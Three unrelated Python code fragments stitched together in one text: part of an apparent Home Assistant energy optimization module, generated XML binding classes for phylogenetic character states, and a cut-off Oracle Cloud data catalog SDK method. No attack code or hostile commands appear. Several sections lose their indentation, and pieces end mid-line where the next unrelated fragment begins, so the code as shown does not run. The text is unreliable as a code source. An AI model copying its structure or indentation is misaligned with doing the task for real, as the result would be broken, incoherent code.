    get_data_from_file: Optional[bool] = False) -> dict:
    """
    Set up some of the data needed for the different actions.

    :param config_path: The absolute path where the config.yaml file is located
    :type config_path: str
    :param base_path: The parent folder holding the data files (CSV/pickle)
    :type base_path: str
    :param costfun: The type of cost function to use for optimization problem
    :type costfun: str
    :param params: Configuration parameters passed from data/options.json
    :type params: str
    :param runtimeparams: Runtime optimization parameters passed as a dictionnary
    :type runtimeparams: str
    :param set_type: Set the type of setup based on following type of optimization
    :type set_type: str
    :param logger: The passed logger object
    :type logger: logging object
    :param get_data_from_file: Use data from saved CSV file (useful for debug)
    :type get_data_from_file: bool, optional
    :return: A dictionnary with multiple data used by the action functions
    :rtype: dict
    """
    logger.info("Setting up needed data")
    # Parsing yaml
    retrieve_hass_conf, optim_conf, plant_conf = utils.get_yaml_parse(config_path, params=params)
    # Treat runtimeparams
    params, optim_conf = utils.treat_runtimeparams(runtimeparams, params, retrieve_hass_conf,
                                                  optim_conf, plant_conf, set_type, logger)
    # Define main objects
    rh = retrieve_hass(retrieve_hass_conf['hass_url'], retrieve_hass_conf['long_lived_token'],
                       retrieve_hass_conf['freq'], retrieve_hass_conf['time_zone'],
                       params, base_path, logger, get_data_from_file=get_data_from_file)
    fcst = forecast(retrieve_hass_conf, optim_conf, plant_conf,
                    params, base_path, logger, get_data_from_file=get_data_from_file)
    opt = optimization(retrieve_hass_conf, optim_conf, plant_conf,
                       fcst.var_load_cost, fcst.var_prod_price,
                       costfun, base_path, logger)
    # Perform setup based on type of action
    if set_type == "perfect-optim":
        # Retrieve data from hass
        if get_data_from_file:
            with open(pathlib.Path(base_path+'/data/test_df_final.pkl'), 'rb') as inp:
                rh.df_final, days_list, var_list = pickle.load(inp)
        else:
            days_list = utils.get_days_list(retrieve_hass_conf['days_to_retrieve'])
            var_list = [retrieve_hass_conf['var_load'], retrieve_hass_conf['var_PV']]
            rh.get_data(days_list, var_list,
                        minimal_response=False, significant_changes_only=False)
        rh.prepare_data(retrieve_hass_conf['var_load'], load_negative = retrieve_hass_conf['load_negative'],
                        set_zero_min = retrieve_hass_conf['set_zero_min'],
                        var_replace_zero = retrieve_hass_conf['var_replace_zero'],
                        var_interp = retrieve_hass_conf['var_interp'])
        df_input_data = rh.df_final.copy()
        # What we don't need for this type of action
        P_PV_forecast, P_load_forecast, df_input_data_dayahead = None, None, None
    elif set_type == "dayahead-optim":
        # Get PV and load forecasts
        df_weather = fcst.get_weather_forecast(method=optim_conf['weather_forecast_method'])
        P_PV_forecast = fcst.get_power_from_weather(df_weather)
        P_load_forecast = fcst.get_load_forecast(method=optim_conf['load_forecast_method'])
        df_input_data_dayahead = pd.concat([P_PV_forecast, P_load_forecast], axis=1)
        df_input_data_dayahead = utils.set_df_index_freq(df_input_data_dayahead)
        df_input_data_dayahead.columns = ['P_PV_forecast', 'P_load_forecast']
        params = json.loads(params)
        if 'prediction_horizon' in params['passed_data'] and params['passed_data']['prediction_horizon'] is not None:
            # Truncate the day-ahead data to the requested horizon
            prediction_horizon = params['passed_data']['prediction_horizon']
            df_input_data_dayahead = copy.deepcopy(df_input_data_dayahead)[df_input_data_dayahead.index[0]:df_input_data_dayahead.index[prediction_horizon-1]]
        # What we don't need for this type of action
        df_input_data, days_list = None, None
    elif set_type == "naive-mpc-optim":
        # Retrieve data from hass
        if get_data_from_file:
            with open(pathlib.Path(base_path+'/data/test_df_final.pkl'), 'rb') as inp:
                rh.df_final, days_list, var_list = pickle.load(inp)
        else:
            days_list = utils.get_days_list(1)
            var_list = [retrieve_hass_conf['var_load'], retrieve_hass_conf['var_PV']]
            rh.get_data(days_list, var_list,
                        minimal_response=False, significant_changes_only=False)
        rh.prepare_data(retrieve_hass_conf['var_load'], load_negative = retrieve_hass_conf['load_negative'],
                        set_zero_min = retrieve_hass_conf['set_zero_min'],
                        var_replace_zero = retrieve_hass_conf['var_replace_zero'],
                        var_interp = retrieve_hass_conf['var_interp'])
        df_input_data = rh.df_final.copy()
        # Get PV and load forecasts, mixing in the current observed data
        df_weather = fcst.get_weather_forecast(method=optim_conf['weather_forecast_method'])
        P_PV_forecast = fcst.get_power_from_weather(df_weather, set_mix_forecast=True, df_now=df_input_data)
        P_load_forecast = fcst.get_load_forecast(method=optim_conf['load_forecast_method'], set_mix_forecast=True, df_now=df_input_data)
        df_input_data_dayahead = pd.concat([P_PV_forecast, P_load_forecast], axis=1)
        df_input_data_dayahead = utils.set_df_index_freq(df_input_data_dayahead)
        df_input_data_dayahead.columns = ['P_PV_forecast', 'P_load_forecast']
        params = json.loads(params)
        if 'prediction_horizon' in params['passed_data'] and params['passed_data']['prediction_horizon'] is not None:
            prediction_horizon = params['passed_data']['prediction_horizon']
            df_input_data_dayahead = copy.deepcopy(df_input_data_dayahead)[df_input_data_dayahead.index[0]:df_input_data_dayahead.index[prediction_horizon-1]]
    elif set_type == "publish-data":
        df_input_data, df_input_data_dayahead = None, None
        P_PV_forecast, P_load_forecast = None, None
        days_list = None
    else:
        logger.error("The passed action argument and hence the set_type parameter for setup is not valid")
        # Fall back to empty data so the returned dictionnary is still
        # well-formed; previously these names were left unbound and the
        # dict construction below raised an UnboundLocalError.
        df_input_data, df_input_data_dayahead = None, None
        P_PV_forecast, P_load_forecast = None, None
        days_list = None
    # The input data dictionnary to return
    input_data_dict = {
        'root': base_path,
        'retrieve_hass_conf': retrieve_hass_conf,
        'rh': rh,
        'opt': opt,
        'fcst': fcst,
        'df_input_data': df_input_data,
        'df_input_data_dayahead': df_input_data_dayahead,
        'P_PV_forecast': P_PV_forecast,
        'P_load_forecast': P_load_forecast,
        'costfun': costfun,
        'params': params,
        'days_list': days_list
    }
    return input_data_dict
def perfect_forecast_optim(input_data_dict: dict, logger: logging.Logger,
    save_data_to_file: Optional[bool] = True, debug: Optional[bool] = False) -> pd.DataFrame:
    """
    Perform a call to the perfect forecast optimization routine.

    :param input_data_dict: A dictionnary with multiple data used by the action functions
    :type input_data_dict: dict
    :param logger: The passed logger object
    :type logger: logging object
    :param save_data_to_file: Save optimization results to CSV file
    :type save_data_to_file: bool, optional
    :param debug: A debug option useful for unittests
    :type debug: bool, optional
    :return: The output data of the optimization
    :rtype: pd.DataFrame
    """
    logger.info("Performing perfect forecast optimization")
    fcst = input_data_dict['fcst']
    # Enrich the retrieved data with the load cost forecast, then with the
    # production price forecast, before handing it to the optimizer.
    df_input_data = fcst.get_load_cost_forecast(
        input_data_dict['df_input_data'],
        method=fcst.optim_conf['load_cost_forecast_method'])
    df_input_data = fcst.get_prod_price_forecast(
        df_input_data,
        method=fcst.optim_conf['prod_price_forecast_method'])
    opt_res = input_data_dict['opt'].perform_perfect_forecast_optim(
        df_input_data, input_data_dict['days_list'])
    # Keep a per-costfun CSV for analysis, or just overwrite the latest results.
    if save_data_to_file:
        filename = 'opt_res_perfect_optim_' + input_data_dict['costfun']
    else:
        filename = 'opt_res_latest'
    if not debug:
        opt_res.to_csv(
            input_data_dict['root'] + '/data/' + filename + '.csv',
            index_label='timestamp')
    return opt_res
def dayahead_forecast_optim(input_data_dict: dict, logger: logging.Logger,
    save_data_to_file: Optional[bool] = False, debug: Optional[bool] = False) -> pd.DataFrame:
    """
    Perform a call to the day-ahead optimization routine.

    :param input_data_dict: A dictionnary with multiple data used by the action functions
    :type input_data_dict: dict
    :param logger: The passed logger object
    :type logger: logging object
    :param save_data_to_file: Save optimization results to CSV file
    :type save_data_to_file: bool, optional
    :param debug: A debug option useful for unittests
    :type debug: bool, optional
    :return: The output data of the optimization
    :rtype: pd.DataFrame
    """
    logger.info("Performing day-ahead forecast optimization")
    fcst = input_data_dict['fcst']
    # Enrich the day-ahead input data with load cost and production price forecasts.
    df_input_data_dayahead = fcst.get_load_cost_forecast(
        input_data_dict['df_input_data_dayahead'],
        method=fcst.optim_conf['load_cost_forecast_method'])
    df_input_data_dayahead = fcst.get_prod_price_forecast(
        df_input_data_dayahead,
        method=fcst.optim_conf['prod_price_forecast_method'])
    opt_res_dayahead = input_data_dict['opt'].perform_dayahead_forecast_optim(
        df_input_data_dayahead,
        input_data_dict['P_PV_forecast'],
        input_data_dict['P_load_forecast'])
    # Use a dated file name for later publishing, or overwrite the latest results.
    if save_data_to_file:
        today = datetime.now(timezone.utc).replace(hour=0, minute=0, second=0, microsecond=0)
        filename = 'opt_res_dayahead_' + today.strftime("%Y_%m_%d")
    else:
        filename = 'opt_res_latest'
    if not debug:
        opt_res_dayahead.to_csv(
            input_data_dict['root'] + '/data/' + filename + '.csv',
            index_label='timestamp')
    return opt_res_dayahead
def naive_mpc_optim(input_data_dict: dict, logger: logging.Logger,
    save_data_to_file: Optional[bool] = False, debug: Optional[bool] = False) -> pd.DataFrame:
    """
    Perform a call to the naive Model Predictive Controller optimization routine.

    :param input_data_dict: A dictionnary with multiple data used by the action functions
    :type input_data_dict: dict
    :param logger: The passed logger object
    :type logger: logging object
    :param save_data_to_file: Save optimization results to CSV file
    :type save_data_to_file: bool, optional
    :param debug: A debug option useful for unittests
    :type debug: bool, optional
    :return: The output data of the optimization
    :rtype: pd.DataFrame
    """
    logger.info("Performing naive MPC optimization")
    fcst = input_data_dict['fcst']
    # Enrich the day-ahead input data with load cost and production price forecasts.
    df_input_data_dayahead = fcst.get_load_cost_forecast(
        input_data_dict['df_input_data_dayahead'],
        method=fcst.optim_conf['load_cost_forecast_method'])
    df_input_data_dayahead = fcst.get_prod_price_forecast(
        df_input_data_dayahead,
        method=fcst.optim_conf['prod_price_forecast_method'])
    # The MPC-specific parameters are supplied at runtime via passed_data.
    passed_data = input_data_dict['params']['passed_data']
    opt_res_naive_mpc = input_data_dict['opt'].perform_naive_mpc_optim(
        df_input_data_dayahead,
        input_data_dict['P_PV_forecast'],
        input_data_dict['P_load_forecast'],
        passed_data['prediction_horizon'],
        passed_data['soc_init'],
        passed_data['soc_final'],
        passed_data['def_total_hours'])
    # Use a dated file name for later publishing, or overwrite the latest results.
    if save_data_to_file:
        today = datetime.now(timezone.utc).replace(hour=0, minute=0, second=0, microsecond=0)
        filename = 'opt_res_naive_mpc_' + today.strftime("%Y_%m_%d")
    else:
        filename = 'opt_res_latest'
    if not debug:
        opt_res_naive_mpc.to_csv(
            input_data_dict['root'] + '/data/' + filename + '.csv',
            index_label='timestamp')
    return opt_res_naive_mpc
def publish_data(input_data_dict: dict, logger: logging.Logger,
save_data_to_file: Optional[bool] = False) -> pd.DataFrame:
"""
Publish the data obtained from the optimization results.
:param input_data_dict: A dictionnary with multiple data used by the action functions
:type input_data_dict: dict
:param logger: The passed logger object
:type logger: logging object
:param save_data_to_file: If True we will read data from optimization results in dayahead CSV file
:type save_data_to_file: bool, optional
:return: The output data of the optimization readed from a CSV file in the data folder
:rtype: pd.DataFrame
"""
logger.info("Publishing data to HASS instance")
# Check if a day ahead optimization has been performed (read CSV file)
if save_data_to_file:
today = datetime.now(timezone.utc).replace(hour=0, minute=0, second=0, microsecond=0)
filename = 'opt_res_dayahead_'+today.strftime("%Y_%m_%d")
else:
filename = 'opt_res_latest'
if not os.path.isfile(input_data_dict['root'] + '/data/' + filename + '.csv'):
logger.error("File not found error, run an optimization task first.")
else:
opt_res_latest = pd.read_csv(input_data_dict['root'] + '/data/' + filename + '.csv', index_col='timestamp')
opt_res_latest.index = pd.to_datetime(opt_res_latest.index)
opt_res_latest.index.freq = input_data_dict['retrieve_hass_conf']['freq']
# Estimate the current index
now_precise = datetime.now(input_data_dict['retrieve_hass_conf']['time_zone']).replace(second=0, microsecond=0)
if input_data_dict['retrieve_hass_conf']['method_ts_round'] == 'nearest':
idx_closest = opt_res_latest.index.get_indexer([now_precise], method='nearest')[0]
elif input_data_dict['retrieve_hass_conf']['method_ts_round'] == 'first':
idx_closest = opt_res_latest.index.get_indexer([now_precise], method='ffill')[0]
elif input_data_dict['retrieve_hass_conf']['method_ts_round'] == 'last':
idx_closest = opt_res_latest.index.get_indexer([now_precise], method='bfill')[0]
if idx_closest == -1:
idx_closest = opt_res_latest.index.get_indexer([now_precise], method='nearest')[0]
# Publish PV forecast
input_data_dict['rh'].post_data(opt_res_latest['P_PV'], idx_closest,
'sensor.p_pv_forecast', "W", "PV Power Forecast")
# Publish Load forecast
input_data_dict['rh'].post_data(opt_res_latest['P_Load'], idx_closest,
'sensor.p_load_forecast', "W", "Load Power Forecast")
cols_published = ['P_PV', 'P_Load']
# Publish deferrable loads
for k in range(input_data_dict['opt'].optim_conf['num_def_loads']):
if "P_deferrable{}".format(k) not in opt_res_latest.columns:
logger.error("P_deferrable{}".format(k)+" was not found in results DataFrame. Optimization task may need to be relaunched or | |
in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
    def buildAttributes(self, node, attrs, already_processed):
        # Parse the 'tokens', 'states' and 'codon' XML attributes of this
        # char element onto the instance, validating the integer-valued
        # ones, then delegate any remaining attributes to the superclass.
        # NOTE(review): this appears to be generateDS.py-generated code
        # (Python 2 `except ..., exp` syntax) — confirm before hand-editing.
        value = find_attr_value_('tokens', node)
        if value is not None and 'tokens' not in already_processed:
            already_processed.append('tokens')
            try:
                self.tokens = int(value)
            except ValueError, exp:
                raise_parse_error(node, 'Bad integer attribute: %s' % exp)
            # Schema requires xs:positiveInteger, i.e. strictly > 0.
            if self.tokens <= 0:
                raise_parse_error(node, 'Invalid PositiveInteger')
            self.validate_MSTokenLength(self.tokens) # validate type MSTokenLength
        value = find_attr_value_('states', node)
        if value is not None and 'states' not in already_processed:
            already_processed.append('states')
            self.states = value
        value = find_attr_value_('codon', node)
        if value is not None and 'codon' not in already_processed:
            already_processed.append('codon')
            try:
                self.codon = int(value)
            except ValueError, exp:
                raise_parse_error(node, 'Bad integer attribute: %s' % exp)
            # Schema requires xs:nonNegativeInteger, i.e. >= 0.
            if self.codon < 0:
                raise_parse_error(node, 'Invalid NonNegativeInteger')
            self.validate_CodonPosition(self.codon) # validate type CodonPosition
        super(AbstractChar, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # AbstractChar defines no child elements of its own; all child
        # handling is delegated to the superclass.
        super(AbstractChar, self).buildChildren(child_, node, nodeName_, True)
        pass
# end class AbstractChar
class AbstractStates(IDTagged):
    """A container for a set of AbstractState elements.

    Holds plain states, polymorphic state sets, uncertain state sets and
    generic sets, each as a list. Provides XML export/import (`export*`,
    `build*`) and Python-literal export (`exportLiteral*`) machinery.

    NOTE(review): this appears to be generateDS.py-generated binding code;
    confirm before hand-editing (changes are normally made in the schema
    or generator instead).
    """
    subclass = None
    superclass = IDTagged
    def __init__(self, about=None, meta=None, label=None, id=None, state=None, polymorphic_state_set=None, uncertain_state_set=None, set=None, valueOf_=None):
        super(AbstractStates, self).__init__(about, meta, label, id, )
        # Each child collection defaults to a fresh list per instance
        # (never a shared mutable default).
        if state is None:
            self.state = []
        else:
            self.state = state
        if polymorphic_state_set is None:
            self.polymorphic_state_set = []
        else:
            self.polymorphic_state_set = polymorphic_state_set
        if uncertain_state_set is None:
            self.uncertain_state_set = []
        else:
            self.uncertain_state_set = uncertain_state_set
        if set is None:
            self.set = []
        else:
            self.set = set
    def factory(*args_, **kwargs_):
        # Instantiate the registered subclass when one is installed,
        # otherwise this class itself.
        if AbstractStates.subclass:
            return AbstractStates.subclass(*args_, **kwargs_)
        else:
            return AbstractStates(*args_, **kwargs_)
    factory = staticmethod(factory)
    # Generated accessor/mutator helpers for the child collections.
    def get_state(self): return self.state
    def set_state(self, state): self.state = state
    def add_state(self, value): self.state.append(value)
    def insert_state(self, index, value): self.state[index] = value
    def get_polymorphic_state_set(self): return self.polymorphic_state_set
    def set_polymorphic_state_set(self, polymorphic_state_set): self.polymorphic_state_set = polymorphic_state_set
    def add_polymorphic_state_set(self, value): self.polymorphic_state_set.append(value)
    def insert_polymorphic_state_set(self, index, value): self.polymorphic_state_set[index] = value
    def get_uncertain_state_set(self): return self.uncertain_state_set
    def set_uncertain_state_set(self, uncertain_state_set): self.uncertain_state_set = uncertain_state_set
    def add_uncertain_state_set(self, value): self.uncertain_state_set.append(value)
    def insert_uncertain_state_set(self, index, value): self.uncertain_state_set[index] = value
    def get_set(self): return self.set
    def set_set(self, set): self.set = set
    def add_set(self, value): self.set.append(value)
    def insert_set(self, index, value): self.set[index] = value
    # XML serialization: writes this element (with xsi:type) and its children.
    def export(self, outfile, level, namespace_='', name_='AbstractStates', namespacedef_=''):
        showIndent(outfile, level)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = []
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='AbstractStates')
        outfile.write(' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"')
        if 'xsi:type' not in already_processed:
            outfile.write(' xsi:type="AbstractStates"')
        # Self-closing tag when there are no children to write.
        if self.hasContent_():
            outfile.write('>\n')
            self.exportChildren(outfile, level + 1, namespace_, name_)
            showIndent(outfile, level)
            outfile.write('</%s%s>\n' % (namespace_, name_))
        else:
            outfile.write('/>\n')
    def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='AbstractStates'):
        super(AbstractStates, self).exportAttributes(outfile, level, already_processed, namespace_, name_='AbstractStates')
    def exportChildren(self, outfile, level, namespace_='', name_='AbstractStates', fromsubclass_=False):
        super(AbstractStates, self).exportChildren(outfile, level, namespace_, name_, True)
        for state_ in self.get_state():
            state_.export(outfile, level, namespace_, name_='state')
        for polymorphic_state_set_ in self.get_polymorphic_state_set():
            polymorphic_state_set_.export(outfile, level, namespace_, name_='polymorphic_state_set')
        for uncertain_state_set_ in self.get_uncertain_state_set():
            uncertain_state_set_.export(outfile, level, namespace_, name_='uncertain_state_set')
        for set_ in self.set:
            set_.export(outfile, level, namespace_, name_='set')
    def hasContent_(self):
        # True when any child collection is non-empty or the superclass
        # has content of its own.
        if (
            self.state or
            self.polymorphic_state_set or
            self.uncertain_state_set or
            self.set or
            super(AbstractStates, self).hasContent_()
            ):
            return True
        else:
            return False
    # Python-literal serialization (constructor-call style output).
    def exportLiteral(self, outfile, level, name_='AbstractStates'):
        level += 1
        self.exportLiteralAttributes(outfile, level, [], name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)
    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        super(AbstractStates, self).exportLiteralAttributes(outfile, level, already_processed, name_)
    def exportLiteralChildren(self, outfile, level, name_):
        super(AbstractStates, self).exportLiteralChildren(outfile, level, name_)
        showIndent(outfile, level)
        outfile.write('state=[\n')
        level += 1
        for state_ in self.state:
            showIndent(outfile, level)
            outfile.write('model_.AbstractState(\n')
            state_.exportLiteral(outfile, level, name_='AbstractState')
            showIndent(outfile, level)
            outfile.write('),\n')
        level -= 1
        showIndent(outfile, level)
        outfile.write('],\n')
        showIndent(outfile, level)
        outfile.write('polymorphic_state_set=[\n')
        level += 1
        for polymorphic_state_set_ in self.polymorphic_state_set:
            showIndent(outfile, level)
            outfile.write('model_.AbstractPolymorphicStateSet(\n')
            polymorphic_state_set_.exportLiteral(outfile, level, name_='AbstractPolymorphicStateSet')
            showIndent(outfile, level)
            outfile.write('),\n')
        level -= 1
        showIndent(outfile, level)
        outfile.write('],\n')
        showIndent(outfile, level)
        outfile.write('uncertain_state_set=[\n')
        level += 1
        for uncertain_state_set_ in self.uncertain_state_set:
            showIndent(outfile, level)
            outfile.write('model_.AbstractUncertainStateSet(\n')
            uncertain_state_set_.exportLiteral(outfile, level, name_='AbstractUncertainStateSet')
            showIndent(outfile, level)
            outfile.write('),\n')
        level -= 1
        showIndent(outfile, level)
        outfile.write('],\n')
        showIndent(outfile, level)
        outfile.write('set=[\n')
        level += 1
        for set_ in self.set:
            showIndent(outfile, level)
            outfile.write('model_.StateSet(\n')
            set_.exportLiteral(outfile, level, name_='StateSet')
            showIndent(outfile, level)
            outfile.write('),\n')
        level -= 1
        showIndent(outfile, level)
        outfile.write('],\n')
    # XML deserialization: populate this instance from an element tree node.
    def build(self, node):
        self.buildAttributes(node, node.attrib, [])
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
    def buildAttributes(self, node, attrs, already_processed):
        super(AbstractStates, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Child elements are polymorphic: the concrete class is chosen by
        # the xsi:type attribute and looked up in globals().
        if nodeName_ == 'state':
            type_name_ = child_.attrib.get('{http://www.w3.org/2001/XMLSchema-instance}type')
            if type_name_ is None:
                type_name_ = child_.attrib.get('type')
            if type_name_ is not None:
                type_names_ = type_name_.split(':')
                if len(type_names_) == 1:
                    type_name_ = type_names_[0]
                else:
                    # Strip the namespace prefix from a qualified type name.
                    type_name_ = type_names_[1]
                class_ = globals()[type_name_]
                obj_ = class_.factory()
                obj_.build(child_)
            else:
                raise NotImplementedError(
                    'Class not implemented for <state> element')
            self.state.append(obj_)
        elif nodeName_ == 'polymorphic_state_set':
            type_name_ = child_.attrib.get('{http://www.w3.org/2001/XMLSchema-instance}type')
            if type_name_ is None:
                type_name_ = child_.attrib.get('type')
            if type_name_ is not None:
                type_names_ = type_name_.split(':')
                if len(type_names_) == 1:
                    type_name_ = type_names_[0]
                else:
                    type_name_ = type_names_[1]
                class_ = globals()[type_name_]
                obj_ = class_.factory()
                obj_.build(child_)
            else:
                raise NotImplementedError(
                    'Class not implemented for <polymorphic_state_set> element')
            self.polymorphic_state_set.append(obj_)
        elif nodeName_ == 'uncertain_state_set':
            type_name_ = child_.attrib.get('{http://www.w3.org/2001/XMLSchema-instance}type')
            if type_name_ is None:
                type_name_ = child_.attrib.get('type')
            if type_name_ is not None:
                type_names_ = type_name_.split(':')
                if len(type_names_) == 1:
                    type_name_ = type_names_[0]
                else:
                    type_name_ = type_names_[1]
                class_ = globals()[type_name_]
                obj_ = class_.factory()
                obj_.build(child_)
            else:
                raise NotImplementedError(
                    'Class not implemented for <uncertain_state_set> element')
            self.uncertain_state_set.append(obj_)
        elif nodeName_ == 'set':
            # <set> children always map to the concrete StateSet class.
            obj_ = StateSet.factory()
            obj_.build(child_)
            self.set.append(obj_)
        super(AbstractStates, self).buildChildren(child_, node, nodeName_, True)
# end class AbstractStates
class AbstractState(IDTagged):
    """The AbstractState type is the super-class for a state definition.
    The element has a required symbol attribute that in restricted
    concrete subclasses must be of a sensible type such as a single
    IUPAC character. It may enclose zero or more AbstractMapping
    elements to resolve ambiguities.

    NOTE(review): this appears to be generateDS.py-generated binding code;
    confirm before hand-editing.
    """
    subclass = None
    superclass = IDTagged
    def __init__(self, about=None, meta=None, label=None, id=None, symbol=None, valueOf_=None):
        super(AbstractState, self).__init__(about, meta, label, id, )
        # The symbol attribute is stored as-is (no target type conversion).
        self.symbol = _cast(None, symbol)
        pass
    def factory(*args_, **kwargs_):
        # Instantiate the registered subclass when one is installed,
        # otherwise this class itself.
        if AbstractState.subclass:
            return AbstractState.subclass(*args_, **kwargs_)
        else:
            return AbstractState(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_symbol(self): return self.symbol
    def set_symbol(self, symbol): self.symbol = symbol
    # XML serialization: writes this element (with xsi:type) and its children.
    def export(self, outfile, level, namespace_='', name_='AbstractState', namespacedef_=''):
        showIndent(outfile, level)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = []
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='AbstractState')
        outfile.write(' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"')
        if 'xsi:type' not in already_processed:
            outfile.write(' xsi:type="AbstractState"')
        # Self-closing tag when there is no content to write.
        if self.hasContent_():
            outfile.write('>\n')
            self.exportChildren(outfile, level + 1, namespace_, name_)
            showIndent(outfile, level)
            outfile.write('</%s%s>\n' % (namespace_, name_))
        else:
            outfile.write('/>\n')
    def exportAttributes(self, outfile, level, already_processed, namespace_='', name_='AbstractState'):
        super(AbstractState, self).exportAttributes(outfile, level, already_processed, namespace_, name_='AbstractState')
        if self.symbol is not None and 'symbol' not in already_processed:
            already_processed.append('symbol')
            outfile.write(' symbol=%s' % (quote_attrib(self.symbol), ))
    def exportChildren(self, outfile, level, namespace_='', name_='AbstractState', fromsubclass_=False):
        super(AbstractState, self).exportChildren(outfile, level, namespace_, name_, True)
    def hasContent_(self):
        if (
            super(AbstractState, self).hasContent_()
            ):
            return True
        else:
            return False
    # Python-literal serialization (constructor-call style output).
    def exportLiteral(self, outfile, level, name_='AbstractState'):
        level += 1
        self.exportLiteralAttributes(outfile, level, [], name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)
    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        if self.symbol is not None and 'symbol' not in already_processed:
            already_processed.append('symbol')
            showIndent(outfile, level)
            outfile.write('symbol = %s,\n' % (self.symbol,))
        super(AbstractState, self).exportLiteralAttributes(outfile, level, already_processed, name_)
    def exportLiteralChildren(self, outfile, level, name_):
        super(AbstractState, self).exportLiteralChildren(outfile, level, name_)
    # XML deserialization: populate this instance from an element tree node.
    def build(self, node):
        self.buildAttributes(node, node.attrib, [])
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
    def buildAttributes(self, node, attrs, already_processed):
        value = find_attr_value_('symbol', node)
        if value is not None and 'symbol' not in already_processed:
            already_processed.append('symbol')
            self.symbol = value
        super(AbstractState, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # AbstractState defines no child elements of its own.
        super(AbstractState, self).buildChildren(child_, node, nodeName_, True)
        pass
# end class AbstractState
class ContinuousChar(AbstractChar):
"""A concrete implementation of the char element, which requires only
an id attribute."""
subclass = None
superclass = AbstractChar
def __init__(self, about=None, meta=None, label=None, id=None, tokens=None, states=None, codon=None, valueOf_=None):
super(ContinuousChar, self).__init__(about, meta, label, id, tokens, states, codon, )
self.states = _cast(None, states)
self.tokens = _cast(None, tokens)
self.codon = _cast(None, codon)
if meta is None:
self.meta = []
else:
self.meta = meta
def factory(*args_, **kwargs_):
if ContinuousChar.subclass:
return ContinuousChar.subclass(*args_, **kwargs_)
else:
return ContinuousChar(*args_, **kwargs_)
factory = staticmethod(factory)
def get_meta(self): return self.meta
def set_meta(self, meta): self.meta = meta
def add_meta(self, value): self.meta.append(value)
def insert_meta(self, index, value): self.meta[index] = value
def get_states(self): return self.states
def set_states(self, states): self.states = states
def get_tokens(self): return self.tokens
def set_tokens(self, tokens): self.tokens = tokens
def validate_MSTokenLength(self, value):
# Validate type MSTokenLength, a restriction on xs:positiveInteger.
pass
def get_codon(self): return self.codon
def set_codon(self, codon): self.codon = codon
def validate_CodonPosition(self, value):
# Validate type CodonPosition, a restriction on xs:nonNegativeInteger.
pass
def export(self, outfile, level, namespace_='', name_='ContinuousChar', namespacedef_=''):
showIndent(outfile, level)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = []
self.exportAttributes(outfile, level, already_processed, namespace_, name_='ContinuousChar')
if self.hasContent_():
outfile.write('>\n')
| |
should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://oracle-cloud-infrastructure-python-sdk.readthedocs.io/en/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type list of :class:`~oci.data_catalog.models.CatalogSummary`
:rtype: :class:`~oci.response.Response`
"""
resource_path = "/catalogs"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"display_name",
"limit",
"page",
"lifecycle_state",
"sort_order",
"sort_by",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_catalogs got unknown kwargs: {!r}".format(extra_kwargs))
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIMECREATED", "DISPLAYNAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
query_params = {
"compartmentId": compartment_id,
"displayName": kwargs.get("display_name", missing),
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing),
"lifecycleState": kwargs.get("lifecycle_state", missing),
"sortOrder": kwargs.get("sort_order", missing),
"sortBy": kwargs.get("sort_by", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="list[CatalogSummary]")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="list[CatalogSummary]")
def list_connections(self, catalog_id, data_asset_key, **kwargs):
"""
Returns a list of all Connections for a data asset.
:param str catalog_id: (required)
Unique catalog identifier.
:param str data_asset_key: (required)
Unique data asset key.
:param str display_name: (optional)
